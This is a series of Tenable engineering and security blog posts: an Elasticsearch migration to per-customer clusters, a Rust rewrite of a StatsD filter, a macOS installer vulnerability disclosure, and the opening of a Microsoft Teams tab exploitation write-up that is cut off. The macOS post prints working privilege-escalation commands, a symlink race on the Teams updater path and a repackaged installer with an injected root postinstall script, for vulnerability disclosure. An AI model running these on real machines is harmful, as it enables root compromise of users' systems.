Scaling Tenable.io — From Site to Cell

Since the inception of Tenable.io, keeping up with data pressure has been a continuous challenge. This data pressure comes from two dimensions: the growth of the customer base and the growth of usage from each customer. This challenge has been most notable in Elasticsearch, since it is one of the most important stages in our petabyte-scale SaaS pipeline.

When customers run vulnerability scans, the Nessus scanners upload the scan data to Tenable.io. There, the data is broken down into documents detailing vulnerability information, including data such as asset information and cyber exposure details. These documents are then aggregated into an Elasticsearch index. However, when the index reached the scale of hundreds of nodes per cluster, the team discovered that further horizontal scaling would affect overall stability. We would encounter more hot shard problems, leading to uneven load across the index and affecting the user experience. This post will detail the re-architecture that both solved this scaling problem and achieved massive performance improvements for our customers.

Incremental Scaling from Site to Cell

Tenable.io scales by sites, where each site handles requests for a group of customers.

Each point of presence, called a site, contains a multi-tenant Elasticsearch instance to be used by geographically similar customers. As data pressure increases, however, further horizontal scaling destabilizes that Elasticsearch cluster, which in turn causes instability at the site level.

To overcome this challenge, our overall strategy was to break out the site-wide (monolith) Elasticsearch cluster into multiple smaller, more manageable clusters. We call these smaller clusters cells. The rule is simple: If a customer has over 100 million documents, they will be isolated into their own cell. Smaller customers will be moved to one of the general population (GP) clusters. We came up with a technique to achieve zero downtime migration with massive performance gains.

Migrating from site to cell, where a customer with a large dataset may get their own Elasticsearch cluster.
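A minimal sketch of the placement rule in Python. Only the 100 million document threshold comes from the text above; the `Customer` type, the cluster naming scheme, and the way smaller customers are spread over GP clusters are assumptions made for illustration.

```python
from dataclasses import dataclass
from typing import Sequence

# Threshold stated in the post: customers above this get a dedicated cell.
DEDICATED_CELL_THRESHOLD = 100_000_000


@dataclass(frozen=True)
class Customer:
    customer_id: str      # hypothetical identifier format
    document_count: int   # documents currently indexed for this customer


def assign_cluster(customer: Customer, gp_clusters: Sequence[str]) -> str:
    """Return the name of the cluster that should hold this customer's data."""
    if customer.document_count > DEDICATED_CELL_THRESHOLD:
        # Large customers are isolated into their own cell (naming is hypothetical).
        return f"cell-{customer.customer_id}"
    # Assumption: smaller customers are spread over the GP clusters with a
    # stable hash of the ID. The post does not say how GP placement is decided.
    index = sum(customer.customer_id.encode()) % len(gp_clusters)
    return gp_clusters[index]
```

A stable hash keeps a small customer on the same GP cluster between calls, whatever its current document count.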

Request Routing and Backfill

To achieve a zero downtime migration, we implemented two key pieces of software:

  1. An Elasticsearch proxy that can:

  • Transparently proxy any Elasticsearch request to any Elasticsearch cluster
  • Intelligently tee any write request (e.g. Index, Bulk) to one or more clusters

  2. A Spark job that can:

  • Query specific customer data
  • Using parallelized scrolls, read the Spark dataframes from the monolith cluster
  • Map the Spark dataframes from the monolith cluster directly to the cell-based cluster

To start, we reconfigured micro-services to communicate with Elasticsearch through the proxy. Based on the targeted customer (more on this later), the proxy performed dual write to the old monolith cluster and the new cell-based cluster. Once the dual write began, all new documents started flowing to the new cell cluster. For all older documents, we ran a Spark job to pull old data from the monolith cluster to the new cell cluster. Finally, after the Spark job completed, we cut all new queries over to the new cell cluster.

A zero downtime backfill process. Step 1: start dual write. Step 2: Backfill old data. Step 3: Cutover reads.
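The three steps can be modeled with a small in-memory simulation. This is a sketch under stated assumptions, not the actual proxy or Spark job: `Cluster`, `MigrationProxy`, and `backfill` are hypothetical names, and plain dictionaries stand in for Elasticsearch indices. The backfill uses create semantics so it never overwrites a document that the dual write has already delivered.

```python
class Cluster:
    """In-memory stand-in for an Elasticsearch cluster (doc ID -> document)."""

    def __init__(self, name):
        self.name = name
        self.docs = {}

    def index(self, doc_id, doc):
        # Index semantics: create the document or overwrite it.
        self.docs[doc_id] = doc

    def create(self, doc_id, doc):
        # Create semantics: never overwrite an existing document.
        if doc_id in self.docs:
            return False
        self.docs[doc_id] = doc
        return True


class MigrationProxy:
    """Hypothetical proxy state for one customer being migrated."""

    def __init__(self, monolith, cell):
        self.monolith, self.cell = monolith, cell
        self.dual_write = False      # step 1 flips this to True
        self.read_from = monolith    # step 3 points this at the cell

    def write(self, doc_id, doc):
        self.monolith.index(doc_id, doc)
        if self.dual_write:
            self.cell.index(doc_id, doc)

    def read(self, doc_id):
        return self.read_from.docs.get(doc_id)


def backfill(source, destination):
    """Step 2: copy old documents, skipping ones the dual write already sent."""
    return sum(destination.create(doc_id, doc)
               for doc_id, doc in list(source.docs.items()))
```

Used in order (set `dual_write`, call `backfill`, then switch `read_from`), every document written before or during the migration is readable from the cell once reads are cut over.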

Elasticsearch Proxy

With the cell architecture, we see a future where migrating customers from one Elasticsearch cluster to another is a common event. Customers in a multi-tenant cluster can easily outgrow the cluster’s capacity over time and require migration to other clusters. In addition, we need to reindex the data from time to time to adjust immutable settings (e.g. shard count). With this in mind, we want to make sure this type of migration is completely transparent to all the micro services. This is why we built a proxy to encapsulate all customer routing logic such that all data allocation is completely transparent to client services.

The Elasticsearch proxy encapsulates all customer routing logic, hiding it from all other services.

For the proxy to be able to route requests to the correct Elasticsearch clusters, it needs the customer ID to be sent along with each request. To achieve this, we injected an X-CUSTOMER-ID HTTP header in each search and index request. The proxy inspected the X-CUSTOMER-ID header in each request, looked up the customer-to-cluster mapping, and forwarded the request on to the correct cluster.
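A minimal sketch of that lookup in Python. Only the X-CUSTOMER-ID header name comes from the text; the function name, the shape of the mapping, and the fallback cluster are assumptions for illustration.

```python
from typing import Mapping, Optional

CUSTOMER_HEADER = "X-CUSTOMER-ID"  # header name taken from the post


class UnknownCustomerError(LookupError):
    """Raised when a customer has no cluster mapping and no default is set."""


def resolve_cluster(headers: Mapping[str, str],
                    customer_to_cluster: Mapping[str, str],
                    default_cluster: Optional[str] = None) -> str:
    """Pick the upstream cluster URL for a search or index request."""
    # HTTP header names are case-insensitive, so normalize before the lookup.
    normalized = {name.lower(): value for name, value in headers.items()}
    customer_id = normalized.get(CUSTOMER_HEADER.lower())
    if customer_id is None:
        raise ValueError(f"missing {CUSTOMER_HEADER} header")
    cluster = customer_to_cluster.get(customer_id.strip(), default_cluster)
    if cluster is None:
        raise UnknownCustomerError(customer_id)
    return cluster
```

Falling back to a default cluster (for example the monolith) is one possible policy for customers that have not been migrated yet; rejecting the request is the stricter alternative.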

While search and index requests always target a single customer, a bulk request contains a large number of documents for numerous customers. A single X-CUSTOMER-ID HTTP header would not provide sufficient routing information for the request. To overcome this, we found an interesting hack in Elasticsearch.

A bulk request body is encoded in a newline-delimited JSON (NDJSON) structure. Each action line is an operation to be performed on a document. This is an example directly copied from Elasticsearch documentation:

We found that within an action line, you can append any amount of metadata to the line as long as it is outside the action body. Elasticsearch seems to accept the request and ignore the extra content with no side effects (verified with ES2 to ES7). With this technique, we modified all clients of the Summary index to append customer IDs to every action.

With this modification, the proxy has enough information to break down a bulk request into subrequests for each customer.
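To illustrate the idea, the sketch below splits an NDJSON bulk body into one sub-request per customer. The key name `customer_id` and its placement next to the action object are assumptions, since the exact metadata format is not shown here. The sketch relies on the documented bulk format, in which `index`, `create`, and `update` actions are followed by a source line and `delete` is not.

```python
import json
from collections import defaultdict

ACTIONS_WITH_SOURCE = {"index", "create", "update"}  # delete has no source line
CUSTOMER_KEY = "customer_id"  # hypothetical name for the appended metadata


def split_bulk_by_customer(body: str) -> dict:
    """Group the lines of an NDJSON bulk body by the customer on each action."""
    lines = [line for line in body.split("\n") if line.strip()]
    per_customer = defaultdict(list)
    i = 0
    while i < len(lines):
        action_line = lines[i]
        action = json.loads(action_line)
        customer_id = action[CUSTOMER_KEY]
        # The remaining top-level key is the operation name (index, delete, ...).
        operation = next(key for key in action if key != CUSTOMER_KEY)
        per_customer[customer_id].append(action_line)
        i += 1
        if operation in ACTIONS_WITH_SOURCE:
            per_customer[customer_id].append(lines[i])  # the document itself
            i += 1
    # Each sub-request must itself be newline-terminated NDJSON.
    return {cid: "\n".join(chunk) + "\n" for cid, chunk in per_customer.items()}
```

Each resulting body can then be sent to the cluster (or clusters, during a dual write) mapped to that customer.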

Spark Backfill

To backfill old data after dual writes were enabled, we used AWS EMR with the elasticsearch-hadoop SDK to perform parallel scrolls against every shard from the source index. As Spark retrieves the data in the Resilient Distributed Dataset (RDD) format, the same RDD can be written directly to the destination index. Since we’re backfilling old data, we want to make sure we don’t overwrite anything that’s already been written. To accomplish this, we set es.write.operation to “create”. (Look for an upcoming blog post about how Tenable uses Kotlin with EMR and Spark!)

Here’s some high level sample code:
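A rough PySpark-flavored sketch of such a backfill, written for illustration rather than taken from the actual job. The `es.*` keys are elasticsearch-hadoop configuration settings; the `customer_id` field in the query, the `doc_id` helper column, and all function names are assumptions. Handling of conflict responses for documents that already exist in the destination is not shown.

```python
import json

ES_SPARK_FORMAT = "org.elasticsearch.spark.sql"  # elasticsearch-hadoop data source


def read_options(nodes: str, customer_id: str) -> dict:
    """Options for scrolling one customer's documents out of the source index."""
    # Assumption: documents carry a customer_id field that can be filtered on.
    query = json.dumps({"query": {"term": {"customer_id": customer_id}}})
    return {
        "es.nodes": nodes,
        "es.query": query,
        "es.read.metadata": "true",  # expose _id in the _metadata column
    }


def write_options(nodes: str) -> dict:
    """Options for writing to the destination without overwriting documents."""
    return {
        "es.nodes": nodes,
        "es.write.operation": "create",  # setting named in the post
        "es.mapping.id": "doc_id",       # reuse the source document ID
        "es.mapping.exclude": "doc_id",  # keep the helper column out of _source
    }


def run_backfill(spark, source_nodes, dest_nodes, source_index, dest_index,
                 customer_id):
    """Copy one customer's documents between clusters (needs pyspark and
    the elasticsearch-hadoop connector on the Spark classpath)."""
    from pyspark.sql.functions import col  # imported lazily on purpose

    df = (spark.read.format(ES_SPARK_FORMAT)
          .options(**read_options(source_nodes, customer_id))
          .load(source_index))
    (df.withColumn("doc_id", col("_metadata").getItem("_id"))
       .drop("_metadata")
       .write.format(ES_SPARK_FORMAT)
       .options(**write_options(dest_nodes))
       .mode("append")
       .save(dest_index))
```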

To optimize the backfill performance, we performed steps similar to the ones taken by SoundCloud. Specifically, we found the following settings to be the most impactful:

  • Setting the index replica to 0
  • Setting the refresh interval to 5 minutes
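As a sketch, these two settings map onto a body for the Elasticsearch update index settings API (`PUT /<index>/_settings`). The helper names and the values restored after the backfill are assumptions; one replica and a one second refresh interval are used here only as an example of a steady state.

```python
import json


def backfill_index_settings() -> dict:
    """Settings applied to the destination index while the backfill runs."""
    return {"index": {"number_of_replicas": 0, "refresh_interval": "5m"}}


def steady_state_index_settings(replicas: int = 1,
                                refresh_interval: str = "1s") -> dict:
    """Settings to restore afterwards (the defaults here are assumptions)."""
    return {"index": {"number_of_replicas": replicas,
                      "refresh_interval": refresh_interval}}


if __name__ == "__main__":
    # Print the JSON body that would be sent before the backfill starts.
    print(json.dumps(backfill_index_settings(), indent=2))
```

With no replicas each document is indexed only once during the copy, and a long refresh interval means new segments are made searchable less often. Both settings need to be restored before the index serves production reads.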

However, since we are migrating data using a live production system, our primary goal is to minimize performance impact. In the end, we settled on indexing 9000 documents per second as the sweet spot. At this rate, migrating a large customer takes 10–20 hours, which is fast enough for this effort.
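The relationship between the indexing rate and the migration time is simple arithmetic, sketched below. The 9000 documents per second rate and the 10 to 20 hour range come from the text; the function names are illustrative.

```python
DOCS_PER_SECOND = 9_000  # throttled indexing rate from the post
SECONDS_PER_HOUR = 3_600


def docs_migrated(hours: float, rate: int = DOCS_PER_SECOND) -> int:
    """Documents copied in the given number of hours at a constant rate."""
    return int(rate * SECONDS_PER_HOUR * hours)


def hours_needed(doc_count: int, rate: int = DOCS_PER_SECOND) -> float:
    """Hours required to copy doc_count documents at a constant rate."""
    return doc_count / (rate * SECONDS_PER_HOUR)


if __name__ == "__main__":
    print(docs_migrated(10))           # 324000000
    print(docs_migrated(20))           # 648000000
    print(hours_needed(100_000_000))   # roughly 3.1 hours
```

At this rate, a 10 to 20 hour migration corresponds to roughly 324 to 648 million documents, which is consistent with the 100 million document threshold for a dedicated cell.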

Performance Improvement

Since we started this effort, we have seen drastic performance improvements. Elasticsearch scroll speed improved by up to 15X, and query latency decreased by up to several orders of magnitude.

The chart below shows a large scroll request that goes through millions of vulnerabilities. Prior to the cell migration, it could take over 24 hours to run the full scroll. The scroll from the monolith cluster suffers slow performance from the frequent resource contention with other customers, and it is further slowed by our fairness algorithm’s throttling. After the customer is migrated to the cell cluster, the same scroll request completes in just over 1.5 hours. Not only is this a large improvement for this customer, but other customers also reap the benefits of the decrease in contention.

In Summary

Our change in scaling strategy has resulted in large performance improvements for the Tenable.io platform. The new request routing layer and backfill process gave us powerful new tools to shard customer data. The resharding process is now streamlined into an easy, safe, zero-downtime operation.

Overall, the team is thrilled with the end result. It took a lot of ingenuity, dedication, and teamwork to execute a zero downtime migration of this scale.

tl;dr:

  • Exponential customer growth on the Tenable.io platform led to a huge increase in the data stored in a monolithic Elasticsearch cluster, to the point where it was becoming a challenge to scale further with the existing architecture.
  • We broke down the site monolith cluster into cell clusters to improve performance.
  • We migrated customer data through a custom proxy and Spark job, all with zero downtime.
  • Scroll performance improved by up to 15x, and query latency dropped by up to several orders of magnitude.

Brought to you by the Sharders team:
Alan Ning, Alex Barbour, Ciaran Gaffney, Jagan Kondapalli, Johnny Mao, Shannon Prickett, Ted O’Meara, Tristan Burch

Special thanks to Jack Matheson and Vincent Gilcreest for all the help with editing.


Scaling Tenable.io — From Site to Cell was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Optimizing 700 CPUs Away With Rust

In Tenable.io, we are heavy users of Datadog custom metrics. Millions of metrics are sent through Dogstatsd, providing deep insights into the complex platform. As the platform grew, we found that a significant number of metrics sent by legacy apps were obsolete. We tried to hunt down these obsolete metrics in the codebase, but modifying legacy applications was extremely time consuming and risky.

To address this, we deployed a StatsD filter as a Datadog agent sidecar to filter out unnecessary metrics. The filter is a simple UDP datagram forwarder written in Node.js (sample, not actual code). We chose Node.js because, in our environment, its network performance outstripped that of the other languages we could get to production just as quickly. We were able to implement, test and deploy this change across all of the Tenable.io platform within a week.

statsd-filter-proxy is deployed as a sidecar to datadog-agent, filtering all StatsD traffic prior to DogstatsD.
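The core of such a filter can be sketched in a few lines of Python. This is an illustration only, not the Node.js or Rust implementation: it assumes metrics are dropped by name prefix and that one datagram may carry several newline-separated StatsD lines. The function names and addresses are hypothetical.

```python
import socket
from typing import Iterable, Optional, Tuple


def filter_datagram(datagram: bytes,
                    blocked_prefixes: Iterable[bytes]) -> Optional[bytes]:
    """Drop StatsD lines whose metric name starts with a blocked prefix.

    Returns the remaining lines, or None when nothing is left to forward.
    """
    prefixes = tuple(blocked_prefixes)
    kept = [line for line in datagram.split(b"\n")
            if line and not line.startswith(prefixes)]
    return b"\n".join(kept) if kept else None


def serve(listen_addr: Tuple[str, int], forward_addr: Tuple[str, int],
          blocked_prefixes: Iterable[bytes]) -> None:
    """Receive datagrams, filter them, and forward the rest to the agent."""
    prefixes = tuple(blocked_prefixes)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as inbound, \
            socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as outbound:
        inbound.bind(listen_addr)
        while True:
            datagram, _ = inbound.recvfrom(65535)
            filtered = filter_datagram(datagram, prefixes)
            if filtered is not None:
                outbound.sendto(filtered, forward_addr)
```

For example, `serve(("127.0.0.1", 8125), ("127.0.0.1", 8126), [b"legacy.app."])` would forward everything except metrics whose names start with `legacy.app.`; the ports are placeholders.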

While this worked for many months, performance issues began to crop up. As the platform continued to scale up, we were sending more and more metrics through the filter. During the first quarter of 2021, we added over 1.4 million new metrics in an effort to improve our observability. The filters needed more CPU resources to keep up with the new metrics. At this scale, even a minor inefficiency can lead to significant waste. Over time, we were consuming over 1000 CPUs and 400GB of memory on these filters. The overhead had become unacceptable.

We analyzed the performance metrics and decided to rewrite the filter in a more efficient language. We chose Rust for its high performance and safety characteristics. (See our other post on Rust evaluations.) The source code of the new Rust-based filter is available here.

The Rust-based filter is much more efficient than the original implementation. With the ability to fully manage the heap allocations, Rust’s memory allocation for handling each datagram is kept to a minimum. This means that the Rust-based filter only needs a few MB of memory to operate. As a result, we saw a 75% reduction in CPU usage and a 95% reduction in memory usage in production.

Per pod, average CPU reduced from 800m to 200m cores.
Per pod, average memory reduced from 70MB to 5MB.

In addition to reclaiming compute resources, the latency per packet has also dropped by over 50%. While latency isn’t a key performance indicator for this application, it is rewarding to see that we are running twice as fast for a fraction of the resources.

With this small change, we were able to optimize away over 700 CPUs and 300GB of memory. This was all implemented, tested and deployed in a single sprint (two weeks). Once the new filter was deployed, we were able to confirm the resource reduction in Datadog metrics.

CPU / Memory usage dropped drastically following the deployment

Source: https://github.com/tenable/statsd-filter-proxy-rs

TL;DR:

  • Replaced the JS-based StatsD filter with a Rust-based one and saw a huge performance improvement.
  • At scale, even a small optimization can have a huge impact.

Optimizing 700 CPUs Away With Rust was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

More macOS Installer Flaws

Back in December, we wrote about attacking macOS installers. Over the last couple of months, as my team looked into other targets, we kept an eye on the installers of applications we were using and interacting with regularly. During our research, we noticed yet another of the aforementioned flaws in the Microsoft Teams installer and in the process of auditing it, discovered another generalized flaw with macOS package installers.

Frustrated by the prevalence of these issues, we decided to write them up and make separate reports to both Apple and Microsoft. We wrote to Apple to recommend implementing a fix similar to what they did for CVE-2020-9817 and explained the additional LPE mechanism discovered. We wrote to Microsoft to recommend a fix for the flaw in their installer.

Both companies have rejected these submissions and suggestions. Below you will find full explanations of these flaws as well as proofs-of-concept that can be integrated into your existing post-exploitation arsenals.

Attack Surface

To recap from the previous blog, macOS installers have a variety of convenience features that allow developers to customize the installation process for their applications. Most notable of these features are preinstall and postinstall scripts. These are scripts that run before and after the actual application files are copied to their final destination on a given system.

If the installer itself requires elevated privileges for any reason, such as setting up a system-level Launch Daemon for an auto-updater service, the installer will prompt the user for permission to elevate privileges to root. There is also the case of unattended installations automatically doing this, but we will not be covering that in this post.

The primary issue being discussed here occurs when these scripts — running as root — read from and write to locations that a normal, lower-privileged user has control over.

Issue 1: Usage of Insecure Directories During Elevated Installations

In July 2020, NCC Group posted their advisory for CVE-2020-9817. In this advisory, they discuss an issue where files extracted to Installer Sandbox directories retained the permissions of a lower-privileged user, even when the installer itself was running with root privileges. This means that any local attacker (local for code execution, not necessarily physical access) could modify these files and potentially escalate to root privileges during the installation process.

NCC Group conceded that these issues could be mitigated by individual developers, but chose to report the issue to Apple to suggest a more holistic solution. Apple appears to have agreed, provided a fix in HT211170, and assigned a CVE identifier.

Apple’s solution was simple: They modified files extracted to an installer sandbox to obtain the permissions of the user the installer is currently running as. This means that lower privileged users would not be able to modify these files during the installation process and influence actions performed by root.

Similar to the sandbox issue, as noted in our previous blog post, it isn’t uncommon for developers to use other less-secure directories during the installation process. The most common directories we’ve come across that fit this bill are /tmp and /Applications, which both have read/write access for standard users.

Let’s use Microsoft Teams as yet another example of this. During the installation process for Teams, the application contents are moved to /Applications as normal. The postinstall script creates a system-level Launch Daemon that points to the TeamsUpdaterDaemon application (/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon), which will run with root permissions. The issue is that if a local attacker is able to create the /Applications/Microsoft Teams.app directory tree prior to installation, they can overwrite the TeamsUpdaterDaemon application with their own custom payload during the installation process. That payload will then be run as a Launch Daemon, giving the attacker root permissions. This is possible because, while the installation scripts do change the write permissions on this file to root-only, creating the directory tree in advance thwarts this permission change because of the open nature of /Applications.

The following demonstrates a quick proof of concept:

# Prep Steps Before Installing
/tmp ❯❯❯ mkdir -p "/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/"
# Just before installing, have this running. Inelegant, but it works for demonstration purposes.
# Payload can be whatever. It won't spawn a GUI, though, so a custom dropper or other application would be necessary.
/tmp ❯❯❯ while true; do
ln -f -F -s /tmp/payload "/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon";
done
# Run installer. Wait for the TeamsUpdaterDaemon to be called.

The above creates a symlink to an arbitrary payload at the file path used in the postinstall script to create the Launch Daemon. During the installation process, this directory is owned by the lower-privileged user, meaning they can modify the files placed here for a short period of time before the installation scripts change the permissions to allow only root to modify them.

In our report to Microsoft, we recommended verifying the integrity of the TeamsUpdaterDaemon prior to creating the Launch Daemon entry or using the preinstall script to verify permissions on the /Applications/Microsoft Teams.app directory.

The Microsoft Teams vulnerability triage team has been met with criticism over their handling of vulnerability disclosures these last couple of years. We’d expected that their recent inclusion in Pwn2Own showcased vast improvements in this area, but unfortunately, their communications in this disclosure as well as other disclosures we’ve recently made regarding their products demonstrate that this is not the case.

Full thread: https://mobile.twitter.com/EyalItkin/status/1395278749805985792
Full thread: https://twitter.com/mattaustin/status/1200891624298954752
Full thread: https://twitter.com/MalwareTechBlog/status/1254752591931535360

In response to our disclosure report, Microsoft stated that this was a non-issue because /Applications requires root privileges to write to. We pointed out that this was not true and that if it was, it would mean the installation of any application would require elevated privileges, which is clearly not the case.

We received a response stating that they would review the information again. A few days later our ticket was closed with no reason or response given. After some prodding, the triage team finally stated that they were still unable to confirm that /Applications could be written to without root privileges. Microsoft has since stated that they have no plans to release any immediate fix for this issue.

Apple’s response was different. They stated that they did not consider this a security concern and that mitigations for this sort of issue were best left up to individual developers. While this is a totally valid response and we understand their position, we requested information regarding the difference in treatment from CVE-2020-9817. Apple did not provide a reason or explanation.

Issue 2: Bypassing Gatekeeper and Code Signing Requirements

During our research, we also discovered a way to bypass Gatekeeper and code signing requirements for package installers.

According to Gatekeeper documentation, packages downloaded from the internet or created from other possibly untrusted sources are supposed to have their signatures validated and a prompt is supposed to appear to authorize the opening of the installer. See the following quote for Apple’s explanation:

When a user downloads and opens an app, a plug-in, or an installer package from outside the App Store, Gatekeeper verifies that the software is from an identified developer, is notarized by Apple to be free of known malicious content, and hasn’t been altered. Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.

In the case of downloading a package from the internet, we can observe that modifying the package will trigger an alert to the user upon opening it claiming that it has failed signature validation due to being modified or corrupted.

Failed signature validation for a modified package

If we duplicate the package and modify it, however, we can modify contained files at will and repackage it sans signature. Most users will not notice that the installer is no longer signed (the lock symbol in the upper right-hand corner of the installer dialog will be missing) since the remainder of the assets used in the installer will look as expected. This newly modified package will also run without being caught or validated by Gatekeeper and could allow malware or some other malicious actor to achieve privilege escalation to root. (Note: The applications installed will still be checked by Gatekeeper when they are run post-installation. The issue presented here regards the scripts run by the installer.) Additionally, this process can be completely automated by monitoring for .pkg downloads and abusing the fact that all .pkg files follow the same general format and structure.

The below instructions can be used to demonstrate this process using the Microsoft Teams installer. Please note that this issue is not specific to this installer/product and can be generalized and automated to work with any arbitrary installer.

To start, download the Microsoft Teams installation package here: https://www.microsoft.com/en-us/microsoft-teams/download-app#desktopAppDownloadregion

When downloaded, the binary should appear in the user’s Downloads folder (~/Downloads). Before running the installer, open a Terminal session and run the following commands:

# Rename the package
yes | mv ~/Downloads/Teams_osx.pkg ~/Downloads/old.pkg
# Extract package contents
pkgutil --expand ~/Downloads/old.pkg ~/Downloads/extract
# Modify the post installation script used by the installer
mv ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
# Prepend the payload lines to the original script (printf with single quotes behaves the same in sh, bash and zsh)
{ printf '#!/usr/bin/env sh\nid > ~/Downloads/exploit\n'; cat ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak; } > ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
rm -f ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
chmod +x ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
# Repackage and rename the installer as expected
pkgutil -f --flatten ~/Downloads/extract ~/Downloads/Teams_osx.pkg

When a user runs this newly created package, it will operate exactly as expected from the perspective of the end-user. Post-installation, however, we can see that the postinstall script run during installation has created a new file at ~/Downloads/exploit that contains the output of the id command as run by the root user, demonstrating successful privilege escalation.

Demo of above proof of concept

When we reported the above to Apple, this was the response we received:

Based on the steps provided, it appears you are reporting Gatekeeper does not apply to a package created locally. This is expected behavior.

We confirmed that this is indeed what we were reporting and requested additional information based on the Gatekeeper documentation available:

Apple explained that their initial explanation was faulty, but maintained that Gatekeeper acted as expected in the provided scenario.

Essentially, they state that locally created packages are not checked for malicious content by Gatekeeper nor are they required to be signed. This means that even packages that require root privileges to run can be copied, modified, and recreated locally in order to bypass security mechanisms. This allows an attacker with local access to man-in-the-middle package downloads and escalate privileges to root when a package that requires root privileges is executed.

Conclusion and Mitigations

So, are these flaws actually a big deal? From a realistic risk standpoint, no, not really. This is just another tool in an already stuffed post-exploitation toolbox, though it should be noted that similar installer-based attack vectors are actively being exploited, as is the case in recent SolarWinds news.

From a triage standpoint, however, this is absolutely a big deal for a couple of reasons:

  1. Apple has put so much effort over the last few iterations of macOS into baseline security measures that it seems counterproductive to their development goals to ignore basic issues such as these (especially issues they’ve already implemented similar fixes for).
  2. It demonstrates how much emphasis some vendors place on making issues go away rather than solving them.

We understand that vulnerability triage teams are absolutely bombarded with half-baked vulnerability reports, but becoming unresponsive during the disclosure response, overusing canned messaging, or simply giving incorrect reasons should not be the norm and highlights many of the frustrations researchers experience when interacting with these larger organizations.

We want to point out that we do not blame any single organization or individual here and acknowledge that there may be bigger things going on behind the scenes that we are not privy to. It’s also totally possible that our reports or explanations were hot garbage and our points were not clearly made. In either case, though, communications from the vendors should have been better about what information was needed to clarify the issues before they were simply discarded.

Circling back to the issues at hand, what can users do to protect themselves? It’s impractical for everyone to manually audit each and every installer they interact with. The occasional spot check with Suspicious Package, which shows all scripts executed when an installer package is run, never hurts. In general, though, paying attention to proper code signatures (look for the lock in the upper right-hand corner of the installer) goes a long way.

For developers, pay special attention to the directories and files being used during the installation process when creating distribution packages. In general, it’s best practice to use an installer sandbox whenever possible. When that isn’t possible, verifying the integrity of files as well as enforcing proper permissions on the directories and files being operated on is enough to mitigate these issues.
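As an illustration of the permission check, the sketch below walks a directory tree and reports entries that a lower-privileged user could tamper with. It is a hedged example, not a vetted hardening tool: the function name, the choice of checks, and the default trusted UID of 0 are assumptions.

```python
import os
import stat


def find_untrusted_entries(root: str, trusted_uid: int = 0) -> list:
    """Return (path, reason) pairs for entries that look tamperable."""
    findings = []
    if not os.path.lexists(root):
        return findings  # nothing pre-created, nothing to inspect
    pending = [root]
    while pending:
        path = pending.pop()
        info = os.lstat(path)  # lstat inspects the link itself, not its target
        if stat.S_ISLNK(info.st_mode):
            findings.append((path, "symlink"))
            continue  # never follow links
        if info.st_uid != trusted_uid:
            findings.append((path, "unexpected owner"))
        if info.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((path, "group/world writable"))
        if stat.S_ISDIR(info.st_mode):
            pending.extend(os.path.join(path, name) for name in os.listdir(path))
    return findings
```

A preinstall step could abort, or remove and recreate the tree as root, when a call such as `find_untrusted_entries("/Applications/Microsoft Teams.app")` returns anything. A check like this is not atomic, so it complements rather than replaces verifying file integrity before registering anything that runs as root.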

Further details on these discoveries can be found in TRA-2021-19, TRA-2021-20, and TRA-2021-21.


More macOS Installer Flaws was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs

Trading up a small bug for a big impact

Intro

I recently came across an interesting bug in the Microsoft Power Apps service which, despite its simplicity, can be leveraged by an attacker to gain persistent read/write access to a victim user’s email, Teams chats, OneDrive, SharePoint and a variety of other services by way of a malicious Microsoft Teams tab and Power Automate flows. The bug has since been fixed by Microsoft, but in this blog we’re going to see how it could have been exploited.

In the following sections, we’ll take a look at how we, as baduser(at)fakecorp.ca, a member of the fakecorp.ca organization, can create a malicious Teams tab and use it to eventually steal emails, Teams messages, and files from gooduser(at)fakecorp.ca, and send emails and messages on their behalf. While the attack we will look at has a lot of moving parts, it is fairly serious, as the compromise of business email is said to have cost victims $1.8 billion in 2020.

As an example to get us started, here is a quick clip of this method being used by Bad User to steal a Word document from Good User’s private OneDrive for Business.

Teams Tabs, Power Apps and Power Automate Flows

If you are already familiar with Teams and the Power Platform, feel free to skip this section, but otherwise, it may be useful to go over the pieces of the puzzle we’ll be using later.

Microsoft Teams has a default feature that allows a user to launch small applications as a tab in any team they are part of. If that user is part of an Office 365/Teams organization with a Business Basic license or above, they also have access to a set of Teams tabs which consist of Microsoft Power Apps applications.

A Teams tab with the Bulletins Power App

Power Apps are part of the wider Microsoft Power Platform, and when a user of a particular team launches their first Power App tab, it creates what Microsoft calls a “Dataverse for Teams Environment”, which according to Microsoft “is used to store, manage, and share team-specific data, apps, and flows”.

It should also be noted that, apart from the team-specific environments, there is a default environment for the organization as a whole. This is important because users can only create connectors and flows in either the default environment, or for teams which they own, and the attack we’re going to look at requires the ability to create Power Automate flows.

Power Automate is a service which lets users create automated workflows which can operate on their Office 365 organization’s data. For example, these flows can be used to do things like send emails on a particular schedule, or send Microsoft Teams messages any time a file on SharePoint is updated.

Power Automate flow templates

The bug: trusting a bad domain

When a Power App tab is first created for a team, it runs through a deployment process that uses information gathered from the make.powerapps.com domain to install the application to the team dataverse/environment.

Installing the app

Teams tabs generally operate by opening an iframe to a page on a domain which is specified as trusted in that application’s manifest. What we see in the above image is a tab that contains an iframe to the page apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com/somePageHere, which itself is opening an iframe to the make.powerapps.com page passed in makerPortalUrl.

Immediately upon seeing this I was curious if I could make the apps.powerapps.com page load our own content. I noticed a couple of things:

  1. The apps.powerapps.com page will only load the iframe to makerPortalUrl if it is in a Microsoft Teams tab (it uses the Microsoft Teams JavaScript client SDK).
  2. The child iframe would only load if the makerPortalUrl begins with https://make.powerapps.com

